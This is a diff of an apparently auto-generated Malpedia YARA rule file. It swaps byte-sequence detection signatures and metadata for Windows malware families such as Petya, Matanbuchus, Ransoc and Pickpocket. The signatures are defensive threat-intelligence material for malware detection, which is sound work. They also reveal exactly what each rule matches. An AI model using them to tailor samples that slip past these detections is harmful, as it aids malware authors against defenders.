-		$sequence_3 = { 5e 5b c9 c20800 56 8bf1 ff96d4060000 }
-		$sequence_4 = { 8bf8 68???????? 57 ff961c070000 83c40c 6a0b 57 }
-		$sequence_5 = { 33db 895de8 8d7dec ab ab ab 8d45fc }
-		$sequence_6 = { ff969c020000 85c0 0f850d010000 33db 399e08060000 0f84f7000000 33c0 }
-		$sequence_7 = { 895df4 ff9660060000 85c0 7532 385dfc 742d 0fb645fc }
-		$sequence_8 = { 7405 8bce ff5614 53 53 56 ffb640070000 }
-		$sequence_9 = { 56 53 ffb360020000 8975fc 56 }
+		$sequence_0 = { 884dff eb4e 8808 46 40 eb48 80f909 }
+		$sequence_1 = { e8???????? 6a5c 58 6a2a 668945f0 }
+		$sequence_2 = { 50 a3???????? e8???????? 83c410 8b4dfc 33cd 5e }
+		$sequence_3 = { ff75e8 ff15???????? 6828020000 8d85c0fdffff }
+		$sequence_4 = { 6a64 5a ffb57cf7ffff 668945e0 }
+		$sequence_5 = { 8b0485b80f0210 f644010440 7409 803a1a 7504 33c0 eb1c }
+		$sequence_6 = { 59 85c0 0f84da000000 8b4704 8bce 8b7708 c1e102 }
+		$sequence_7 = { 807e0400 0f8564ffffff eb0c ff36 ff15???????? c6460400 5f }
+		$sequence_8 = { 85ff 7450 8d4701 50 }
+		$sequence_9 = { e8???????? a1???????? 33c5 8945fc 53 8b5d08 8d85fdfbffff }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 297984
 }
-rule MALPEDIA_Win_Brbbot_Auto : FILE
+rule MALPEDIA_Win_Matanbuchus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6f8ffa7c-cd8c-50e9-99ce-be919b2bf777"
+		id = "14891cee-6fee-5b85-a869-72db3819e8d3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.brbbot_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matanbuchus_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "81c84b2ac34bd64175981dcc2195841d305509a8b4adcc1041ffc068cd7e1797"
+		logic_hash = "8cc6ad0369ae6a09d94059ca0fd839ca0ba525864e83ed2b19f2484b94f687e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104047,32 +104459,32 @@ rule MALPEDIA_Win_Brbbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d0d14310000 4533c9 ba00000040 4489442420 ff15???????? 488905???????? }
-		$sequence_1 = { 4c8d41ff 488b4d00 e8???????? 443926 7433 488b4d00 488d15e1ca0000 }
-		$sequence_2 = { 8b4d48 41b801000000 4883caff e8???????? 807d580a 4c8d05af3dffff 740f }
-		$sequence_3 = { 488906 8b05???????? 894608 0fb705???????? 6689460c 488bc6 660f1f440000 }
-		$sequence_4 = { 48ffcf 75f5 488bce e8???????? 488bf8 }
-		$sequence_5 = { 81cb00000780 8bc3 4883c448 5f 5b c3 4c8d0562ec0000 }
-		$sequence_6 = { 57 4881ece0010000 488b05???????? 4833c4 48898424d0010000 33ff 33c9 }
-		$sequence_7 = { 7516 488d051cb80000 488b4c2430 483bc8 7405 e8???????? }
-		$sequence_8 = { 750d 488bce e8???????? e9???????? 4c8d2d31bb0000 8bcb 488beb }
-		$sequence_9 = { 8a45d9 4b8b8cf8c05a0100 88443139 4b8b84f8c05a0100 8854303a eb4c }
+		$sequence_0 = { 8955ec 0fb745fc 8b4dd8 668b1441 668955f8 eb0f }
+		$sequence_1 = { 035120 8955dc 8b45f4 8b4d08 03481c 894dcc c745f000000000 }
+		$sequence_2 = { 51 b801000000 6bc800 8b5508 0fbe040a 85c0 }
+		$sequence_3 = { 8b55d4 8b048a 034508 8945d0 0fb74df4 0fb755f8 }
+		$sequence_4 = { 41 66894df8 0fb755fc 85d2 }
+		$sequence_5 = { 0fbe1401 33550c 69c293010001 50 b901000000 c1e100 034d08 }
+		$sequence_6 = { eb04 33c0 eb18 eb82 8b4df4 8b55f4 }
+		$sequence_7 = { 81fa4d5a0000 7407 33c0 e9???????? 8b45e8 8b4d08 }
+		$sequence_8 = { ff55f0 6800800000 6a00 8b5508 }
+		$sequence_9 = { 8b55f0 8b4214 8945e8 33c9 66894dfc }
 
 	condition:
-		7 of them and filesize < 198656
+		7 of them and filesize < 13077504
 }
-rule MALPEDIA_Win_Erebus_Auto : FILE
+rule MALPEDIA_Win_Ransoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "39f02208-f6d1-53ec-bb2d-e4d6d7fbb231"
+		id = "d4231c6d-a004-5baa-86ba-cc26d508cfdf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.erebus_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransoc_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "720efa579203a9c164159e94c36d17e968a866b84ffb4b18a083c36176a0a8d5"
+		logic_hash = "3aba656893a98b7e7e042164f300a01531e4785d0c2a9f4ed3d68e27e1dc31f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104086,32 +104498,32 @@ rule MALPEDIA_Win_Erebus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 53 50 52 8bcf e8???????? 837d1c08 }
-		$sequence_1 = { 32db eb02 b301 57 e8???????? 83c404 c7442420ffffffff }
-		$sequence_2 = { 83c430 837dec10 720b ff75d8 e8???????? 83c404 837d1c10 }
-		$sequence_3 = { 55 57 8bf9 3bfa 7412 8d049d00000000 50 }
-		$sequence_4 = { 732f 8a80c4244f00 8d4da8 88857cfeffff ffb57cfeffff 6a01 e8???????? }
-		$sequence_5 = { 8d4e38 e8???????? 8d87e4000000 50 8d8ee4000000 e8???????? 5f }
-		$sequence_6 = { 8b542410 f30f6f40f0 83c708 8d4920 8d4020 660f380005???????? f30f7f41e0 }
-		$sequence_7 = { 83c40c 8b4610 89442444 8b542450 33c0 8b742454 8bca }
-		$sequence_8 = { 83f905 7d10 668b444b0c 6689044d0c775200 41 ebe8 8bce }
-		$sequence_9 = { bd20000000 83c6fc 2be9 03f2 8b16 8d76fc }
+		$sequence_0 = { c3 57 50 6a01 e8???????? }
+		$sequence_1 = { 8b5034 3bd7 753e 8b7230 }
+		$sequence_2 = { eb02 8913 894a34 895138 8b4834 8b503c }
+		$sequence_3 = { 0f8487000000 56 68???????? 45 e8???????? 83c408 }
+		$sequence_4 = { 394134 7506 8b5034 895134 394140 7506 8b5034 }
+		$sequence_5 = { 8b542428 5d 894808 5b }
+		$sequence_6 = { 89462c a820 7406 8b4604 014804 8b462c a900080000 }
+		$sequence_7 = { eb07 894a34 eb02 890b 894134 894838 8b13 }
+		$sequence_8 = { f7402c00000001 a1???????? 890c24 7505 }
+		$sequence_9 = { 83c618 56 e8???????? 83c40c 5e c3 }
 
 	condition:
-		7 of them and filesize < 2564096
+		7 of them and filesize < 958464
 }
-rule MALPEDIA_Win_Xdspy_Auto : FILE
+rule MALPEDIA_Win_Pickpocket_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54110d73-619a-59d4-a80b-7be8436504a7"
+		id = "802dc3e0-e29e-5fb9-b36e-fb6fbc442d76"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xdspy_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pickpocket_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "6256dc971ecf3bb6744674fefad5e90a83cd8cf7acf2f0addd47bba093a56e7a"
+		logic_hash = "22ebdc63d7f82763f33842db7356986ba14b78ce5a40d50ef0cdea3da00bc1be"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104125,38 +104537,32 @@ rule MALPEDIA_Win_Xdspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85b0510000 50 e8???????? 8d85b0510000 50 897da4 }
-		$sequence_1 = { 5e e8???????? c9 c3 53 56 68???????? }
-		$sequence_2 = { e8???????? 8d851cd1ffff 50 e8???????? ff35???????? 8d851cd1ffff 50 }
-		$sequence_3 = { 89459c ff15???????? 85c0 7413 ff15???????? 3db7000000 7506 }
-		$sequence_4 = { 56 8bf8 e8???????? 83c410 8bd8 85ff }
-		$sequence_5 = { 85f6 0f84ba000000 8975e0 8b04bd804e4100 0500080000 3bf0 }
-		$sequence_6 = { c3 8bff 56 57 33ff 8db730074100 }
-		$sequence_7 = { e8???????? 68ff000000 e8???????? 59 59 8b7508 8d34f548044100 }
-		$sequence_8 = { 0f8514010000 83fb01 0f850b010000 e8???????? 488d8dc0130000 ff15???????? }
-		$sequence_9 = { 88840d80070000 488d4901 84c0 75e8 80bd8007000000 488d8580070000 }
-		$sequence_10 = { 48898424c0000000 4889bc24c8000000 488d8c2480000000 ff15???????? }
-		$sequence_11 = { 4983e801 75ea b801000000 8d501f 6690 }
-		$sequence_12 = { 880413 48ffc3 4883fb0e 7cea }
-		$sequence_13 = { 75e8 488bcb 0f1f440000 420fb684399c941700 }
-		$sequence_14 = { 7413 0f1f840000000000 fe08 488d4001 403838 75f5 }
-		$sequence_15 = { e8???????? 488b05???????? 488d15853a0100 488bcb 83e13f }
+		$sequence_0 = { 85c0 740f b990cc0000 e8???????? }
+		$sequence_1 = { e8???????? 85c0 750f b962890100 }
+		$sequence_2 = { e8???????? 85c0 740f b990cc0000 e8???????? }
+		$sequence_3 = { eb05 b960cb0000 e8???????? eb02 33c0 }
+		$sequence_4 = { 790e b91dca0000 e8???????? 8907 }
+		$sequence_5 = { 7504 33c0 eb0a b9e8d70000 }
+		$sequence_6 = { 8a4201 84c0 7823 83e17f 0fb6c0 c1e107 03c8 }
+		$sequence_7 = { 7404 8b01 eb03 83c8ff 83f804 }
+		$sequence_8 = { a846 750f b99be00100 e8???????? e9???????? }
+		$sequence_9 = { b9dccc0000 e9???????? b9cecc0000 e9???????? b9c7cc0000 e9???????? }
 
 	condition:
-		7 of them and filesize < 3244032
+		7 of them and filesize < 1458176
 }
-rule MALPEDIA_Win_Giftedcrook_Auto : FILE
+rule MALPEDIA_Win_Petya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fdb2b54b-eafe-53d8-b9a6-9bb6fa7e1261"
+		id = "6e25f6ba-0f88-5dbc-a462-9f4861151314"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.giftedcrook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.giftedcrook_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.petya_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c55ae29646ee6e1fa6528687183d61d605ab3a357e4390ae9837f246340b30d4"
+		logic_hash = "e12039168edf2e4657ffd112871fe75ec301f0f0758dfc0dfdc297a04b207216"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104170,32 +104576,32 @@ rule MALPEDIA_Win_Giftedcrook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 744f 4c8bca 4c8d05da9d0400 ba80000000 488d4c2430 e8???????? 0fb69f550a0000 }
-		$sequence_1 = { 488983300d0000 488d15b0720800 c683500d000001 488bcb e8???????? 488b457f 33ff }
-		$sequence_2 = { 4c8bc6 488d154a270500 488bcf e8???????? ba01000000 488bcf e8???????? }
-		$sequence_3 = { 0fbe4550 83c0d3 83f846 0f8794feffff 4898 0fb68402e00e0300 8b8c82bc0e0300 }
-		$sequence_4 = { e8???????? 4c8bf0 4885c0 7512 48396f60 740c 4c8d35bbff0700 }
-		$sequence_5 = { 4c8b8d50070000 4c8d05aa0f0500 488d9598060000 e8???????? 8bf8 85c0 750a }
-		$sequence_6 = { 4489442440 488d4c2450 89542438 4c8d05d2240500 44895c2430 ba18000000 4489542428 }
-		$sequence_7 = { 4c8d05d21a0500 e8???????? 8bf8 85c0 }
-		$sequence_8 = { 8bf2 4c8d0d3d500200 488be9 4c8d052b500200 488d152c500200 b901000000 e8???????? }
-		$sequence_9 = { 48896c2420 4c8d2d28dc0600 448bcf 4d0f45e8 488d1522dc0600 4d8bc5 498bcc }
+		$sequence_0 = { 8bc7 c1e810 88442431 8bc7 c1e808 88442432 }
+		$sequence_1 = { 117c2434 33f6 0facc81c c1e204 0bf0 c1e91c }
+		$sequence_2 = { 56 8b35???????? 33c9 57 33ff 8d0486 8bd8 }
+		$sequence_3 = { 83c604 3bfb 72f0 5f 5e 5b }
+		$sequence_4 = { 0bf1 33442424 33fe 23442420 }
+		$sequence_5 = { 8b4c2420 33fe 8bf0 33da 0facc80e 33d2 c1e612 }
+		$sequence_6 = { 8bca 88442428 8bc6 c1e810 88442429 8bc6 }
+		$sequence_7 = { 56 8b750c 57 83fe01 7517 }
+		$sequence_8 = { 8bca c1e303 0facc110 897c2424 c1e810 8bc2 884c242d }
+		$sequence_9 = { 8b5d0c 33c9 56 8b7508 2bde }
 
 	condition:
-		7 of them and filesize < 1605632
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Nighthawk_Auto : FILE
+rule MALPEDIA_Win_Newsreels_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f73d8e8e-0e22-5d8b-a28a-19526ca65051"
+		id = "e9b53256-b535-5dc7-8672-9faed5bf005d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nighthawk_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newsreels_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "83ca7d457445609b911357175ebed2dd8acc41dfcf066ffda805bb2cf527d439"
+		logic_hash = "a1151606e01c8e298edbe7dd1574962a9c78cdce343ec52b131b424fbeb15649"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104209,32 +104615,32 @@ rule MALPEDIA_Win_Nighthawk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4885c9 7405 e8???????? 4883631000 48c743180f000000 c60300 4883c320 }
-		$sequence_1 = { e8???????? 488b4810 4883781810 7203 488b00 4885c9 7425 }
-		$sequence_2 = { 4c89b5a0010000 4c89bda8010000 4488b590010000 48399dc8010000 7211 488b8db0010000 4885c9 }
-		$sequence_3 = { 4c89742430 4c89742440 48c74424480f000000 41b814000000 488d15deaf0500 488d4c2430 e8???????? }
-		$sequence_4 = { 4c8b43f8 4d85c0 742b 4883c8ff 48ffc0 44382407 75f7 }
-		$sequence_5 = { 4c8b32 492bee 488bc5 48c1f803 480fafc1 4885ed 7473 }
-		$sequence_6 = { 488d542420 488bce e8???????? 90 eb2b 4c892e 41be0f000000 }
-		$sequence_7 = { 57 4883ec40 488360f000 488bf1 83601800 488d0da9db0700 8bda }
-		$sequence_8 = { e9???????? 83fa06 0f8553010000 8d7209 443821 742e 4c8965e0 }
-		$sequence_9 = { eb05 448974246c 4889b580020000 4889b590020000 4889bd98020000 41b823000000 488d1537f50700 }
+		$sequence_0 = { c1e902 f3a5 a1???????? 8bcd 83e103 }
+		$sequence_1 = { 83c41c 85f6 750b 5f }
+		$sequence_2 = { ff15???????? 8b8c241c030000 8dbc240c010000 51 83c9ff 33c0 }
+		$sequence_3 = { 56 ff15???????? 8be8 85ed 750e 56 }
+		$sequence_4 = { 83c410 c6043000 5e 5d 5b 81c4a0010000 }
+		$sequence_5 = { 83c408 85db 750a 5e 5d }
+		$sequence_6 = { 83c703 c1f902 83e13f 897c2424 8a81305d4000 88441efc 8a4c2ffd }
+		$sequence_7 = { 80e301 881c30 40 83f808 }
+		$sequence_8 = { 7415 53 e8???????? 83c404 33c0 }
+		$sequence_9 = { f7d1 2bf9 6a4d 8bf7 8bd9 8bfa 83c9ff }
 
 	condition:
-		7 of them and filesize < 1949696
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Bughatch_Auto : FILE
+rule MALPEDIA_Win_Nikitear_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f21da185-8629-53ca-b1ab-60be907f0853"
+		id = "f8fdb193-3c11-59c1-829a-a9eb5f221c83"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bughatch_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nikitear"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nikitear_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "8c2d742c99e41f022aebe397e085bdb9d00214c3c4ebe4e2052113f6ff7a225a"
+		logic_hash = "78bbb5bb165f52797af65de0137f35c2d932f8f5aaa20ce84f06a64d8b20f48b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104248,32 +104654,32 @@ rule MALPEDIA_Win_Bughatch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec10 8b4508 8945f0 8b4df0 8b5508 03513c 8955f4 }
-		$sequence_1 = { 8945fc 8d95f8f7ffff 52 e8???????? 83c404 8945f8 8b45f8 }
-		$sequence_2 = { 6a00 e8???????? 83c40c eb41 8b450c 50 68???????? }
-		$sequence_3 = { d1e8 8945f4 8b4d08 894df8 c745fc00000000 eb09 }
-		$sequence_4 = { 6a00 8d4de8 51 6a00 8b55fc }
-		$sequence_5 = { ba01000000 6bc200 c6840588fdffff00 837d0c00 7507 33c0 e9???????? }
-		$sequence_6 = { ff15???????? 8b4df8 51 ff15???????? 8b45e0 }
-		$sequence_7 = { 6a00 6a00 ff15???????? b904000000 }
-		$sequence_8 = { 68???????? 8d8d94f7ffff 51 ff15???????? 8b550c }
-		$sequence_9 = { e9???????? 8d55f0 52 8b45e0 50 8b4de4 }
+		$sequence_0 = { 488d8d60010000 ffd0 33c0 c74424204004242e 8844242c }
+		$sequence_1 = { 8d419f 3c19 7706 448d49b9 eb24 8d41d0 3c09 }
+		$sequence_2 = { 48635708 4c8d3dcce5feff 48035508 0fb60a 83e10f 4a0fbe843908460300 428a8c3918460300 }
+		$sequence_3 = { 488d4c2440 4885f6 743f 4c8d054ff7fdff 483bca 7333 80390d }
+		$sequence_4 = { 4c03f3 4c8b6c2460 4b8d0427 4c3bf0 0f94c0 488b4df8 4833cc }
+		$sequence_5 = { 488d151e570200 488d0de7560200 e8???????? 85c0 7529 }
+		$sequence_6 = { 39b42480000000 747b 4c8d0576ce0100 498b04e8 f644f83848 7441 0fb7442470 }
+		$sequence_7 = { 44884c2420 41b901000000 4533c0 418bd1 488bcb e8???????? 83e73f }
+		$sequence_8 = { 48ffc1 4883f90d 7306 0fb65590 ebea 0fb64591 8bce }
+		$sequence_9 = { 4883c227 482bc1 4883c0f8 4883f81f 772a e8???????? 488b4310 }
 
 	condition:
-		7 of them and filesize < 75776
+		7 of them and filesize < 610304
 }
-rule MALPEDIA_Win_Mortalkombat_Auto : FILE
+rule MALPEDIA_Win_Putabmow_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2926ed70-9658-5024-99d2-e9010cd78f8a"
+		id = "91e8d589-44ec-5d63-963b-4d5831e9d035"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mortalkombat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.putabmow_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "6719ab7cb4e15bf8e439d94e5987475ec5045761b54a9759e4f94419dacc6908"
+		logic_hash = "b27fa1335b6a432b3b5508ab17de3d0a99cf669e0fc066f733c76db90efddfc9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104287,32 +104693,32 @@ rule MALPEDIA_Win_Mortalkombat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85e8feffff 50 68???????? e8???????? 85c0 0f849c020000 8d85e8feffff }
-		$sequence_1 = { c745e800000000 8d45d0 50 e8???????? c745b02c010000 c745ac69000000 }
-		$sequence_2 = { 7516 6a10 68???????? 68???????? ff7508 e8???????? }
-		$sequence_3 = { 7401 41 8b35???????? 8bfe 33d2 83fa10 7502 }
-		$sequence_4 = { 68???????? e8???????? 68???????? 6800020000 e8???????? }
-		$sequence_5 = { 33ce 033d???????? 33cf 03d1 81c3b979379e 8bca }
-		$sequence_6 = { 6a00 e8???????? ff0d???????? 6801010000 }
-		$sequence_7 = { 751e 68???????? 68???????? e8???????? 68???????? e8???????? c60000 }
-		$sequence_8 = { 837d0c01 0f85a6010000 833d????????00 7506 ff0d???????? 68???????? 68???????? }
-		$sequence_9 = { 0fb605???????? 83f801 7511 68???????? 68???????? }
+		$sequence_0 = { 6200 3100 680032006f 0033 0010 0035???????? 007b00 }
+		$sequence_1 = { e8???????? c645fc06 8b467c 89477c 8b8680000000 898780000000 8b8684000000 }
+		$sequence_2 = { 32db c78424200b000021000000 8b442418 a802 }
+		$sequence_3 = { c1f905 83e107 094828 8a5201 f6c204 7404 83482810 }
+		$sequence_4 = { 3901 61 0039 016200 3f 016300 3f }
+		$sequence_5 = { 8b4df8 8bd6 ff75e8 57 ff75f0 6a00 50 }
+		$sequence_6 = { 8d8c24b0070000 ff30 e8???????? c68424200b00004c 8d8424e0000000 50 8d8c24f8040000 }
+		$sequence_7 = { c684249404000000 84db 0f8493010000 f7462800004000 8d5618 7502 8b12 }
+		$sequence_8 = { 3bf1 7608 89442420 2bf1 eb02 33f6 8b4314 }
+		$sequence_9 = { 888630977300 46 ebe5 a1???????? 83c9ff f00fc108 7513 }
 
 	condition:
-		7 of them and filesize < 1224704
+		7 of them and filesize < 704512
 }
-rule MALPEDIA_Win_Nevada_Auto : FILE
+rule MALPEDIA_Win_Banpolmex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d851b978-3df8-538e-b0a6-f5a42a4c41f2"
+		id = "09c8ccaf-8f5a-5f11-8d59-2eeae879be55"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nevada"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nevada_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.banpolmex_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "5d586f59dca860d1839b19790bc7f7be57e580648d77868dbbba465dd7726682"
+		logic_hash = "ca7f23e428ff171c615716f21966c01f85ab62bd4b01db41e41afe5b6847958b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104326,32 +104732,32 @@ rule MALPEDIA_Win_Nevada_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4889ea e8???????? 0f0b 4c8d0515c10200 ba00100000 4889e9 e8???????? }
-		$sequence_1 = { 4d89f8 664585e4 0f8597feffff e9???????? 4981fe01010000 0f834a010000 0f57c0 }
-		$sequence_2 = { e8???????? 4c8da42450020000 4c89e1 4889fa 4d89f8 e8???????? 488db42478020000 }
-		$sequence_3 = { 4839ce 74c4 803ea0 72bf eb3e 4839ce 4889d7 }
-		$sequence_4 = { 438a443cff 3c2f 7438 3c5c 7434 e9???????? 41813f5c5c3f5c }
-		$sequence_5 = { 415f c3 4c8d642430 488dac24b0000000 eb26 488b8424c0000000 48035c2420 }
-		$sequence_6 = { 4080fd02 0f8510010000 488d6901 4c39c5 0f83fe000000 803c2abf b301 }
-		$sequence_7 = { 0f821affffff 8b442428 4189442434 8a442427 4188442438 31ed e9???????? }
-		$sequence_8 = { 48837f1000 0f859c010000 4d89c4 4989d7 488d4710 488945e8 48c74710ffffffff }
-		$sequence_9 = { 4c8d3559910200 4c39c9 7317 0f1f840000000000 4885db 740a 803c0b45 }
+		$sequence_0 = { 488bcf e8???????? e9???????? 3d4c494b50 7515 488d4c2430 4c8bc7 }
+		$sequence_1 = { 488b4d07 4885c9 7406 ff15???????? 4183fd04 7512 488d1560960200 }
+		$sequence_2 = { 418bc0 c1e808 0fb6c8 418b848a20de0800 250000ff00 33d0 }
+		$sequence_3 = { 8944246c 8bf8 ff15???????? 488bd8 4885c0 0f847e010000 8d4e40 }
+		$sequence_4 = { 410fb6c5 45338487000c0000 4433460c 418bc0 c1e810 0fb6d0 418bc1 }
+		$sequence_5 = { 0f47d0 8915???????? 488d0d42130900 e8???????? 4c8b6c2468 4c8b642470 488bac24a0000000 }
+		$sequence_6 = { 7439 4883c420 5b c3 488d91d0000000 41b840000000 e8???????? }
+		$sequence_7 = { 4885ff 7406 89aee4000000 4885db 7406 89aee0000000 33c0 }
+		$sequence_8 = { 488d542440 4c8bc3 488bc8 488bf8 c744244000000400 e8???????? 33ed }
+		$sequence_9 = { 488bd3 488bcf e8???????? 85c0 78ba 8b03 803c3805 }
 
 	condition:
-		7 of them and filesize < 1063936
+		7 of them and filesize < 1555456
 }
-rule MALPEDIA_Win_Fatduke_Auto : FILE
+rule MALPEDIA_Win_Open_Carrot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "adb8db95-b0a4-5276-93ef-e2fa83c10075"
+		id = "83f461b8-8266-54de-aecf-ccf2d96f380a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fatduke_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.open_carrot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e52f36e4d51bd81125ac15c50f357b773a2dec05d6d491e80497ca4c3e0bf041"
+		logic_hash = "e66ea48fe876b6e65527515af0e78a716fad581d1208dc43cfdbcb201ec0f71a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104365,32 +104771,32 @@ rule MALPEDIA_Win_Fatduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 c7451c07000000 c7451800000000 33c0 66894508 c745fcffffffff }
-		$sequence_1 = { e8???????? c745fc00000000 33c0 8b4d08 c706???????? f6c101 7505 }
-		$sequence_2 = { 8b4004 8a540840 8855ee 8b4c0838 8b4120 833800 7423 }
-		$sequence_3 = { c784248800000000000000 c784248c00000000000000 c784248c0000000f000000 c784248800000000000000 c644247800 803a00 7504 }
-		$sequence_4 = { a1???????? 33c4 50 8d442430 64a300000000 8bf1 ff74240c }
-		$sequence_5 = { 8b450c 8901 8bc1 8b4df4 64890d00000000 59 5f }
